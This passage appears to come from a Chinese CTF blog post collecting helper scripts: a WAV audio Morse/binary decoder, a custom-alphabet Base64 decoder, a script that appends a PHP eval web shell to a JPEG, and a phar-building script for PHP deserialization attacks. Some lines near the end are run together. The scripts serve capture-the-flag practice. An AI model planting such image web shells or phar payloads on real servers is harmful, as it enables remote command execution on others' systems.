        raw = wf.readframes(wf.getnframes())

    if channels <= 0:
        raise ValueError("invalid WAV channel count")
    if sample_width not in (1, 2, 3, 4):
        raise ValueError(f"unsupported WAV sample width: {sample_width} bytes")

    # Number of complete samples; leftover bytes are ignored.
    count = len(raw) // sample_width

    if sample_width == 1:
        # 8-bit WAV is unsigned; centre it around zero.
        samples = [float(b - 128) for b in raw]
    elif sample_width in (2, 4):
        code = "h" if sample_width == 2 else "i"
        usable = raw[: count * sample_width]
        samples = [float(v) for v in struct.unpack(f"<{count}{code}", usable)]
    else:
        # 24-bit little-endian signed: struct has no format for it.
        samples = [
            float(int.from_bytes(raw[i : i + 3], "little", signed=True))
            for i in range(0, count * 3, 3)
        ]

    if channels > 1:
        whole = len(samples) - len(samples) % channels
        mono: List[float] = [
            sum(samples[i : i + channels]) / channels for i in range(0, whole, channels)
        ]
    else:
        mono = samples

    peak = max((abs(v) for v in mono), default=0.0)
    if peak == 0:
        return [0.0 for _ in mono], sample_rate
    return [v / peak for v in mono], sample_rate
def compute_rms_envelope(samples: Sequence[float], sample_rate: int, frame_ms: float) -> Tuple[List[float], int]:
    """Compute the RMS level of consecutive non-overlapping frames.

    Returns ``(envelope, frame_size)`` where ``frame_size`` is the frame
    length in samples (at least 1). The last frame may be shorter.
    """
    frame_size = max(1, int(round(sample_rate * frame_ms / 1000.0)))
    env: List[float] = []
    for i in range(0, len(samples), frame_size):
        chunk = samples[i : i + frame_size]
        energy = sum(v * v for v in chunk) / len(chunk)
        env.append(math.sqrt(energy))
    return env, frame_size
def make_threshold(envelope: Sequence[float]) -> float:
    """Pick the on/off threshold for an RMS envelope.

    The threshold sits 35% of the way from the 20th to the 85th percentile.
    If those coincide, the maximum replaces the upper value. If the result is
    not positive, 20% of the maximum is used. Returns 0.0 for empty input.
    """
    if not envelope:
        return 0.0
    low = percentile(envelope, 0.20)
    high = percentile(envelope, 0.85)
    if high <= low:
        high = max(envelope)
    threshold = low + (high - low) * 0.35
    if threshold <= 0:
        threshold = max(envelope) * 0.2
    return threshold
def runs_from_states(states: Sequence[int]) -> List[Run]:
    """Run-length encode a state sequence into ``(state, duration)`` pairs."""
    if not states:
        return []
    out: List[Run] = []
    cur = states[0]
    dur = 1
    for s in states[1:]:
        if s == cur:
            dur += 1
            continue
        out.append((cur, dur))
        cur = s
        dur = 1
    out.append((cur, dur))
    return out
def merge_adjacent_runs(runs: Sequence[Run]) -> List[Run]:
    """Merge neighbouring runs of the same state, dropping non-positive durations."""
    merged: List[Run] = []
    for state, dur in runs:
        if dur <= 0:
            continue
        if merged and merged[-1][0] == state:
            merged[-1] = (state, merged[-1][1] + dur)
        else:
            merged.append((state, dur))
    return merged
def smooth_runs(runs: Sequence[Run], min_frames: int) -> List[Run]:
    """Absorb short glitch runs into their neighbours.

    An interior run shorter than ``min_frames`` whose two neighbours share
    the same state is merged with both of them. Passes repeat until nothing
    changes. With ``min_frames <= 1`` the runs are returned unchanged.
    """
    if min_frames <= 1:
        return list(runs)

    out = list(runs)
    changed = True
    while changed and len(out) >= 3:
        changed = False
        i = 1
        while i < len(out) - 1:
            _, dur = out[i]
            if dur < min_frames and out[i - 1][0] == out[i + 1][0]:
                combined = (out[i - 1][0], out[i - 1][1] + dur + out[i + 1][1])
                out[i - 1 : i + 2] = [combined]
                changed = True
                # Step back so the merged run is re-examined as an interior run.
                i = max(1, i - 1)
                continue
            i += 1
    return merge_adjacent_runs(out)
def estimate_time_unit(durations: Sequence[int]) -> float:
    """Estimate the basic time unit (dot or bit length) from run durations.

    Takes the median of the shortest 35% of the positive durations (at least
    one value). Never returns less than 1.0, and returns 1.0 when there are
    no positive durations.
    """
    values = sorted(float(v) for v in durations if v > 0)
    if not values:
        return 1.0
    cutoff = max(1, int(round(len(values) * 0.35)))
    unit = statistics.median(values[:cutoff])
    return max(1.0, unit)
def decode_morse(runs: Sequence[Run]) -> MorseResult:
    """Decode on/off runs as Morse code.

    The dot length is estimated from the "on" runs. An "on" run of at least
    2.4 dots is a dash. A gap of at least 1.7 dots ends a letter, and a gap
    of at least 5.2 dots also ends a word. Unknown symbols decode to "?".
    Returns an empty ``MorseResult`` when there are no "on" runs.
    """
    on_durations = [dur for state, dur in runs if state == 1]
    if not on_durations:
        return MorseResult()

    dot = estimate_time_unit(on_durations)
    dash_threshold = dot * 2.4
    intra_gap_threshold = dot * 1.7
    word_gap_threshold = dot * 5.2

    tokens: List[str] = []
    current = ""

    for state, dur in runs:
        if state == 1:
            current += "-" if dur >= dash_threshold else "."
            continue

        # Short gap: still inside the same letter.
        if dur < intra_gap_threshold:
            continue

        if current:
            tokens.append(current)
            current = ""

        # Long gap: word break, never doubled and never leading.
        if dur >= word_gap_threshold and tokens and tokens[-1] != "/":
            tokens.append("/")

    if current:
        tokens.append(current)

    decoded_chars: List[str] = []
    symbol_count = 0
    unknown_count = 0

    for tk in tokens:
        if tk == "/":
            if decoded_chars and decoded_chars[-1] != " ":
                decoded_chars.append(" ")
            continue
        symbol_count += 1
        ch = MORSE_TO_TEXT.get(tk)
        if ch is None:
            decoded_chars.append("?")
            unknown_count += 1
        else:
            decoded_chars.append(ch)

    known_ratio = 0.0
    if symbol_count > 0:
        known_ratio = (symbol_count - unknown_count) / symbol_count

    return MorseResult(
        dot_unit_frames=int(round(dot)),
        symbol_count=symbol_count,
        unknown_count=unknown_count,
        known_ratio=known_ratio,
        morse_symbols=" ".join(tokens),
        decoded_text="".join(decoded_chars).strip(),
    )
def score_text_quality(text: str) -> float:
    """Score how much ``text`` looks like readable text (higher is better).

    ASCII alphanumerics, CJK ideographs (U+4E00..U+9FFF) and tab/CR/LF count
    fully, other printable ASCII counts 0.6 and other printable characters
    0.2. Penalties apply for NUL characters, a high share of "other
    printable" characters, very short text and text made of one repeated
    character. The result is never negative; empty text scores 0.0.
    """
    if not text:
        return 0.0

    ascii_alnum = 0
    ascii_punct = 0
    cjk_ok = 0
    ws_ok = 0
    misc_printable = 0
    for ch in text:
        o = ord(ch)
        if ch in ("\n", "\r", "\t"):
            ws_ok += 1
        elif ch.isalnum() and o < 128:
            ascii_alnum += 1
        elif 32 <= o <= 126:
            ascii_punct += 1
        elif 0x4E00 <= o <= 0x9FFF:
            cjk_ok += 1
        elif ch.isprintable():
            misc_printable += 1

    length = max(1, len(text))
    base = (ascii_alnum + 0.6 * ascii_punct + cjk_ok + ws_ok + 0.2 * misc_printable) / length
    nul_penalty = text.count("\x00") / length
    misc_ratio = misc_printable / length
    misc_penalty = 0.25 if misc_ratio > 0.35 else 0.0

    stripped = text.strip()
    # Fewer than 4 visible characters costs 0.1 each; whitespace-only costs 0.5.
    short_penalty = max(0.0, (4 - len(stripped)) * 0.1) if stripped else 0.5

    repeat_penalty = 0.0
    if len(stripped) >= 5 and len(set(stripped)) <= 1:
        repeat_penalty = 0.2

    return max(0.0, base - nul_penalty - misc_penalty - short_penalty - repeat_penalty)
def build_bitstream(runs: Sequence[Run], bit_unit: float, trim_edge_zeros: bool) -> str:
    """Expand on/off runs into a string of "0"/"1" bits.

    Each run contributes ``round(duration / bit_unit)`` bits, at least one.
    With ``trim_edge_zeros`` a leading and a trailing "off" run of at least
    two bit units (minimum 2 frames) is treated as padding and dropped.
    Returns "" when ``bit_unit`` is not positive.
    """
    if bit_unit <= 0:
        return ""

    trimmed_runs = list(runs)
    if trim_edge_zeros and trimmed_runs:
        pad_threshold = max(2, int(round(bit_unit * 2)))
        if trimmed_runs[0][0] == 0 and trimmed_runs[0][1] >= pad_threshold:
            trimmed_runs = trimmed_runs[1:]
        if trimmed_runs and trimmed_runs[-1][0] == 0 and trimmed_runs[-1][1] >= pad_threshold:
            trimmed_runs = trimmed_runs[:-1]

    chunks: List[str] = []
    for state, dur in trimmed_runs:
        repeat = max(1, int(round(dur / bit_unit)))
        chunks.append(("1" if state == 1 else "0") * repeat)
    return "".join(chunks)
def decode_binary(
    runs: Sequence[Run],
    trim_edge_zeros: bool,
    max_text_chars: int = 500,
    max_candidates: int = 6,
) -> BinaryResult:
    """Decode on/off runs as a binary pulse stream (on=1, off=0).

    The bit length is estimated from all runs. The bitstream is then tried
    with both bit orders, every bit offset 0..7 and several text encodings.
    Each decoding is scored and the best ``max_candidates`` are kept, best
    first. Returns an empty ``BinaryResult`` when there are no runs.
    """
    durations = [dur for _, dur in runs if dur > 0]
    if not durations:
        return BinaryResult()

    bit_unit = estimate_time_unit(durations)
    bitstream = build_bitstream(runs, bit_unit, trim_edge_zeros=trim_edge_zeros)
    if not bitstream:
        return BinaryResult(bit_unit_frames=int(round(bit_unit)))

    candidates: List[BinaryCandidate] = []
    encodings = ("utf-8", "gb18030", "latin-1")

    for order in ("msb", "lsb"):
        for offset in range(8):
            shifted = bitstream[offset:]
            usable = (len(shifted) // 8) * 8
            if usable < 8:
                continue
            payload = shifted[:usable]

            byte_values: List[int] = []
            for i in range(0, usable, 8):
                chunk = payload[i : i + 8]
                if order == "lsb":
                    chunk = chunk[::-1]
                byte_values.append(int(chunk, 2))
            raw = bytes(byte_values)

            for enc in encodings:
                # errors="ignore" equals a strict decode when the bytes are
                # valid, and drops only the undecodable bytes otherwise.
                text = raw.decode(enc, errors="ignore")[:max_text_chars]
                if not text:
                    continue

                score = score_text_quality(text)
                candidates.append(
                    BinaryCandidate(
                        bit_order=order,
                        offset_bits=offset,
                        encoding=enc,
                        score=round(score, 4),
                        text=text,
                        byte_length=len(raw),
                    )
                )

    # Best score first; longer text wins ties.
    candidates.sort(key=lambda c: (c.score, len(c.text)), reverse=True)

    unique: List[BinaryCandidate] = []
    seen = set()
    for c in candidates:
        key = (c.bit_order, c.offset_bits, c.encoding, c.text)
        if key in seen:
            continue
        seen.add(key)
        unique.append(c)
        if len(unique) >= max_candidates:
            break

    if not unique:
        return BinaryResult(
            bit_unit_frames=int(round(bit_unit)),
            bitstream_length=len(bitstream),
            bitstream_preview=bitstream[:240],
        )

    best = unique[0]
    return BinaryResult(
        bit_unit_frames=int(round(bit_unit)),
        bitstream_length=len(bitstream),
        bitstream_preview=bitstream[:240],
        best_text=best.text,
        best_score=best.score,
        best_bit_order=best.bit_order,
        best_offset_bits=best.offset_bits,
        best_encoding=best.encoding,
        candidates=unique,
    )
def choose_auto_mode(morse: MorseResult, binary: BinaryResult) -> Tuple[str, float, float]:
    """Choose between the Morse and the binary decoding.

    Both raw scores are first discounted for weak evidence: few symbols, only
    dots or only dashes, one repeated character, or very short text. Morse
    wins only when it leads by at least 0.05. Otherwise binary wins if its
    score is positive, else Morse is the fallback.

    Returns:
        ``(mode, morse_score, binary_score)`` with ``mode`` being "morse" or
        "binary".
    """
    morse_score = morse.known_ratio
    if morse.symbol_count < 2:
        morse_score *= 0.65
    else:
        morse_score *= min(1.0, 0.4 + morse.symbol_count / 6.0)

    has_dot = "." in morse.morse_symbols
    has_dash = "-" in morse.morse_symbols
    if not (has_dot and has_dash):
        morse_score *= 0.65

    if morse.decoded_text:
        stripped = morse.decoded_text.replace(" ", "")
        if len(stripped) >= 5 and len(set(stripped)) <= 1:
            morse_score *= 0.7
    else:
        # Nothing decoded at all: Morse cannot win.
        morse_score = 0.0

    binary_score = binary.best_score
    text_len = len(binary.best_text.strip())
    if text_len <= 1:
        binary_score *= 0.5
    else:
        binary_score *= min(1.0, 0.55 + text_len / 10.0)

    if morse_score >= binary_score + 0.05:
        return "morse", morse_score, binary_score
    if binary_score > 0.0:
        return "binary", morse_score, binary_score
    return "morse", morse_score, binary_score
def analyze_audio(
    audio_path: Path,
    frame_ms: float,
    min_run_ms: float,
    trim_edge_zeros: bool,
    max_text_chars: int,
) -> Tuple[SignalStats, List[Run], MorseResult, BinaryResult]:
    """Run the full analysis pipeline on one audio file.

    The audio is loaded, reduced to a per-frame envelope, thresholded into
    on/off states, grouped into smoothed runs, and the runs are handed to both
    the Morse and the binary decoder.

    Args:
        audio_path: Path of the audio file passed to ``load_wav_mono``.
        frame_ms: Envelope frame length in milliseconds.
        min_run_ms: Minimum run length in milliseconds, converted to frames and
            passed to ``smooth_runs``.
        trim_edge_zeros: Forwarded to ``decode_binary``.
        max_text_chars: Forwarded to ``decode_binary``.

    Returns:
        ``(stats, runs, morse, binary)``.
    """
    samples, sample_rate = load_wav_mono(audio_path)
    envelope, _frame_size = compute_rms_envelope(samples, sample_rate, frame_ms=frame_ms)
    threshold = make_threshold(envelope)

    # Binarise the envelope: 1 where the level reaches the threshold, else 0.
    states = []
    for level in envelope:
        states.append(1 if level >= threshold else 0)

    # Convert the minimum run length to whole frames (at least one); the
    # divisor is floored at 1e-6 so a zero frame length cannot divide by zero.
    frames_per_min_run = int(round(min_run_ms / max(frame_ms, 1e-6)))
    min_run_frames = max(1, frames_per_min_run)
    runs = smooth_runs(runs_from_states(states), min_frames=min_run_frames)

    # One pass over the runs to total all frames and the active (state 1) ones.
    total_frames = 0
    active_frames = 0
    for state, duration in runs:
        total_frames += duration
        if state == 1:
            active_frames += duration
    active_ratio = (active_frames / total_frames) if total_frames else 0.0

    duration_sec = (len(samples) / sample_rate) if sample_rate else 0.0
    stats = SignalStats(
        sample_rate=sample_rate,
        duration_sec=duration_sec,
        frame_ms=frame_ms,
        frame_count=len(envelope),
        threshold=threshold,
        run_count=len(runs),
        active_ratio=active_ratio,
    )

    morse = decode_morse(runs)
    binary = decode_binary(
        runs,
        trim_edge_zeros=trim_edge_zeros,
        max_text_chars=max_text_chars,
    )
    return stats, runs, morse, binary
def print_report(
    mode: str,
    selected_mode: str,
    stats: SignalStats,
    runs: Sequence[Run],
    morse: MorseResult,
    binary: BinaryResult,
    verbose: bool,
) -> None:
    """Print a human-readable analysis report to standard output.

    Args:
        mode: Mode requested by the user (``"auto"``, ``"morse"`` or ``"binary"``).
        selected_mode: Mode whose decoded text is reported as the final text.
        stats: Signal statistics shown in the summary section.
        runs: Runs as ``(state, duration_frames)`` pairs; listed when ``verbose``.
        morse: Morse decode result.
        binary: Binary decode result, including its candidate list.
        verbose: When true, also print up to the first 120 runs.
    """
    empty = "<empty>"
    none = "<none>"

    summary_section = [
        "== Signal Summary ==",
        f"sample_rate : {stats.sample_rate} Hz",
        f"duration : {stats.duration_sec:.3f} s",
        f"frame_ms : {stats.frame_ms:.3f} ms",
        f"frame_count : {stats.frame_count}",
        f"threshold : {stats.threshold:.6f}",
        f"run_count : {stats.run_count}",
        f"active_ratio : {stats.active_ratio:.2%}",
        "",
    ]
    print("\n".join(summary_section))

    morse_section = [
        "== Morse Candidate ==",
        f"dot_unit_frames: {morse.dot_unit_frames}",
        f"symbols : {morse.symbol_count}",
        f"known_ratio : {morse.known_ratio:.2%}",
        f"morse_raw : {morse.morse_symbols or empty}",
        f"decoded_text : {safe_text_preview(morse.decoded_text) or empty}",
        "",
    ]
    print("\n".join(morse_section))

    binary_section = [
        "== Binary Candidate ==",
        f"bit_unit_frames: {binary.bit_unit_frames}",
        f"bit_len : {binary.bitstream_length}",
        f"bit_preview : {binary.bitstream_preview or empty}",
        f"best_score : {binary.best_score:.4f}",
        f"best_codec : {binary.best_encoding or none}",
        f"best_order : {binary.best_bit_order or none}",
        f"best_offset : {binary.best_offset_bits}",
        f"decoded_text : {safe_text_preview(binary.best_text) or empty}",
    ]
    if binary.candidates:
        binary_section.append("top_candidates :")
        # Only the four highest-ranked candidates are listed.
        for rank, cand in enumerate(binary.candidates[:4], start=1):
            snippet = safe_text_preview(cand.text, 80)
            binary_section.append(
                f" {rank}. score={cand.score:.4f}, codec={cand.encoding}, "
                f"order={cand.bit_order}, offset={cand.offset_bits}, text={snippet}"
            )
    binary_section.append("")
    print("\n".join(binary_section))

    # In auto mode report what was chosen; otherwise echo the requested mode.
    shown_mode = selected_mode if mode == "auto" else mode
    print(f"selected_mode : {shown_mode}")

    final_text = morse.decoded_text if selected_mode == "morse" else binary.best_text
    print(f"final_text : {safe_text_preview(final_text, 240) or empty}")

    if not verbose:
        return

    print()
    print("== Runs (state, duration_frames, duration_ms) ==")
    for state, frames in runs[:120]:
        print(f"({state}, {frames}, {frames * stats.frame_ms:.2f} ms)")
    if len(runs) > 120:
        print(f"... truncated, total runs: {len(runs)}")
def main() -> None:
    """Command-line entry point: parse options, analyse the file, print a report.

    Raises:
        FileNotFoundError: If the given audio file does not exist.
    """
    cli = argparse.ArgumentParser(
        description="Decode pulse-encoded binary or Morse messages from WAV audio."
    )
    cli.add_argument("audio_file", help="Input WAV file path.")
    cli.add_argument(
        "--mode",
        choices=["auto", "morse", "binary"],
        default="auto",
        help="Decode mode (default: auto).",
    )
    cli.add_argument(
        "--frame-ms",
        type=float,
        default=5.0,
        help="Envelope frame size in milliseconds (default: 5.0).",
    )
    cli.add_argument(
        "--min-run-ms",
        type=float,
        default=15.0,
        help="Minimum run length for spike smoothing (default: 15.0).",
    )
    cli.add_argument(
        "--trim-edge-zeros",
        action="store_true",
        help="Trim large leading/trailing zero padding in binary mode.",
    )
    cli.add_argument(
        "--max-text-chars",
        type=int,
        default=500,
        help="Max text length kept in decode candidates (default: 500).",
    )
    cli.add_argument(
        "--json-out",
        default="",
        help="Optional path to save analysis report as JSON.",
    )
    cli.add_argument(
        "--verbose",
        action="store_true",
        help="Print run list for debugging.",
    )
    opts = cli.parse_args()

    wav_path = Path(opts.audio_file)
    if not wav_path.exists():
        raise FileNotFoundError(f"audio file not found: {wav_path}")

    # Clamp user-supplied tuning values to their lower bounds before analysis.
    stats, runs, morse, binary = analyze_audio(
        audio_path=wav_path,
        frame_ms=max(0.2, opts.frame_ms),
        min_run_ms=max(0.0, opts.min_run_ms),
        trim_edge_zeros=opts.trim_edge_zeros,
        max_text_chars=max(32, opts.max_text_chars),
    )

    # An explicit mode is honoured as-is; only "auto" consults the heuristic.
    if opts.mode in ("morse", "binary"):
        selected_mode = opts.mode
    else:
        selected_mode, _morse_score, _binary_score = choose_auto_mode(morse, binary)

    print_report(
        mode=opts.mode,
        selected_mode=selected_mode,
        stats=stats,
        runs=runs,
        morse=morse,
        binary=binary,
        verbose=opts.verbose,
    )

    if not opts.json_out:
        return

    # Move "candidates" to the end of the binary section, after the scalar fields.
    binary_section = asdict(binary)
    binary_section.pop("candidates", None)
    binary_section["candidates"] = [asdict(cand) for cand in binary.candidates]

    report = {
        "audio_file": str(wav_path),
        "mode": opts.mode,
        "selected_mode": selected_mode,
        "stats": asdict(stats),
        "morse": asdict(morse),
        "binary": binary_section,
        "runs": [{"state": state, "duration_frames": frames} for state, frames in runs],
    }
    with open(opts.json_out, "w", encoding="utf-8") as handle:
        json.dump(report, handle, ensure_ascii=False, indent=2)
    print(f"\nJSON report saved: {opts.json_out}")
# Run the command-line entry point only when executed as a script, not on import.
if __name__ == "__main__": main()
# =========================
# 中文使用说明(示例)
# =========================
# 1) 自动模式(推荐):同时尝试莫斯码和二进制,自动选择更可信结果
#    python generic_surface_scan.py your_audio.wav --mode auto
#
# 2) 只按莫斯码解析
#    python generic_surface_scan.py your_audio.wav --mode morse
#
# 3) 只按二进制解析
#    python generic_surface_scan.py your_audio.wav --mode binary
#
# 4) 导出 JSON 分析报告(包含候选结果、时序分段等)
#    python generic_surface_scan.py your_audio.wav --json-out result.json
#
# 5) 常用调参
#    --frame-ms 包络分析帧长(毫秒),越小越细但更敏感,默认 5.0
#    --min-run-ms 平滑短脉冲噪声阈值(毫秒),默认 15.0
#    --trim-edge-zeros 二进制模式下裁剪前后大段 0 填充
#    --verbose 输出详细分段信息,便于人工排查

MISC之base64:
#!/usr/bin/env python3
"""交互式自定义 Base64 解码器

功能:
1) 输入密文后解码
2) 可选输入自定义 Base64 表
3) 未输入表时默认使用标准 Base64 表
"""
from __future__ import annotations
import base64
class CustomBase64Codec:
    """Decode Base64 text that was produced with an arbitrary 64-character alphabet.

    The active alphabet is mapped position-by-position onto the standard
    Base64 alphabet; the standard library then performs the actual decoding.
    """

    STANDARD_TABLE = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

    def __init__(self, base_table: str | None = None) -> None:
        """Create a codec; ``None`` or an empty string selects the standard alphabet.

        Raises:
            ValueError: If ``base_table`` is given but is not a valid alphabet.
        """
        self.set_base_table(base_table)

    @staticmethod
    def _validate_table(table: str) -> str:
        """Return ``table`` unchanged if it is a usable Base64 alphabet.

        Raises:
            ValueError: If the table is not exactly 64 characters long, contains
                a repeated character, or contains the padding character ``=``.
        """
        if len(table) != 64:
            raise ValueError("Base64 表必须正好 64 个字符。")
        if len(set(table)) != 64:
            raise ValueError("Base64 表中字符不能重复。")
        if "=" in table:
            raise ValueError("Base64 表不能包含 '='。")
        return table

    def set_base_table(self, base_table: str | None) -> None:
        """Switch the active alphabet; a falsy value restores the standard one.

        Raises:
            ValueError: If ``base_table`` fails validation. The previously
                active alphabet stays in effect in that case.
        """
        table = self._validate_table(base_table) if base_table else self.STANDARD_TABLE
        self.base_table = table
        self._decode_table = str.maketrans(table, self.STANDARD_TABLE)

    def decode_to_bytes(self, ciphertext: str) -> bytes:
        """Decode ``ciphertext`` with the active alphabet.

        Whitespace is removed, characters that are neither part of the active
        alphabet nor ``=`` are ignored, and missing ``=`` padding is added.

        Raises:
            binascii.Error: If the remaining data is not decodable Base64
                (a ``ValueError`` subclass).
        """
        accepted = set(self.base_table)
        accepted.add("=")

        compact = "".join(ciphertext.split())
        # Drop foreign characters *before* translating. Otherwise a character
        # that is missing from the custom alphabet but present in the standard
        # one (e.g. "+" with a URL-safe table) would pass through translate()
        # untouched and be decoded as data, and other stray characters would be
        # counted in the padding calculation below.
        symbols = "".join(ch for ch in compact if ch in accepted)
        normalized = symbols.translate(self._decode_table)

        # Pad to a multiple of four so unpadded input is accepted.
        normalized += "=" * (-len(normalized) % 4)
        return base64.b64decode(normalized, validate=False)
class CustomBase64Interactive:
    """Console front end that repeatedly prompts for ciphertext and an alphabet."""

    def __init__(self) -> None:
        self.codec = CustomBase64Codec()

    def run(self) -> None:
        """Prompt, decode and print in a loop until an empty ciphertext is entered."""
        for banner_line in (
            "自定义 Base64 交互解码器",
            "说明: Base64 表留空时,自动使用标准表。",
            "直接回车不输入密文即可退出。",
        ):
            print(banner_line)
        print()

        while True:
            ciphertext = input("请输入密文: ").strip()
            if not ciphertext:
                print("已退出。")
                return

            table_text = input("请输入 Base64 表(64字符,留空默认): ").strip()
            try:
                self.codec.set_base_table(table_text or None)
            except ValueError as exc:
                print(f"[表错误] {exc}")
                print()
                continue

            try:
                raw = self.codec.decode_to_bytes(ciphertext)
            except Exception as exc:  # noqa: BLE001
                # Any decoding problem is reported and the prompt loop continues.
                print(f"[解码失败] {exc}")
                print()
                continue

            print(f"使用的 Base64 表: {self.codec.base_table}")
            try:
                decoded_text = raw.decode("utf-8")
            except UnicodeDecodeError:
                # Not valid UTF-8: show the raw bytes as hex instead.
                print("解码结果不是 UTF-8 文本。")
                print(f"bytes(hex): {raw.hex()}")
            else:
                print(f"解码结果(UTF-8): {decoded_text}")
            print()
if __name__ == "__main__": CustomBase64Interactive().run()

WEB生成图片码脚本:
from PIL import Imageimport io
def generate_image_shell(output_path, shell_code):
    """Write a JPEG image followed by ``shell_code`` to ``output_path``.

    Args:
        output_path: Destination file path; opened in binary write mode.
        shell_code: Text appended after the image data, encoded as UTF-8.
    """
    # Render a real 100x100 solid-colour image into memory as JPEG.
    canvas = Image.new('RGB', (100, 100), color=(73, 109, 137))
    buffer = io.BytesIO()
    canvas.save(buffer, format='JPEG')

    # Final file content: the JPEG bytes first, then the encoded text after
    # the end of the image data.
    payload = buffer.getvalue() + shell_code.encode('utf-8')

    with open(output_path, 'wb') as out_file:
        out_file.write(payload)

    print(f"成功!生成的图片马路径: {output_path}")
    print(f"包含的代码: {shell_code}")
if __name__ == "__main__": # 定义输出文件名和木马内容 target_file = "payload.jpg" php_payload = "<?php @eval($_POST['cmd']); ?>"
generate_image_shell(target_file, php_payload)

WEB_PHP反序列化_phar文件创建脚本:
<?php
// Builds exp.phar, an archive whose metadata holds a TestObject instance.
// Placeholder class: the object stored as the archive's metadata.
class TestObject {}

// NOTE(review): creating a Phar normally requires phar.readonly=0 in php.ini —
// confirm for the PHP setup in use.
$phar = new Phar("exp.phar");
$phar->startBuffering();
// Minimal stub; it only contains the __HALT_COMPILER() marker.
$phar->setStub("<?php __HALT_COMPILER(); ?>");

// Attach the object as the archive's metadata.
$obj = new TestObject();
$phar->setMetadata($obj);

// Add one small file entry to the archive, then end buffering.
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
?>
配合phar伪协议读取文件触发反序列化使用。
- 版权声明:本文由 余林阳 创作,转载请注明出处。
喜欢这篇文章吗?
点击右侧按钮为文章点赞,让更多人看到!
在下余林阳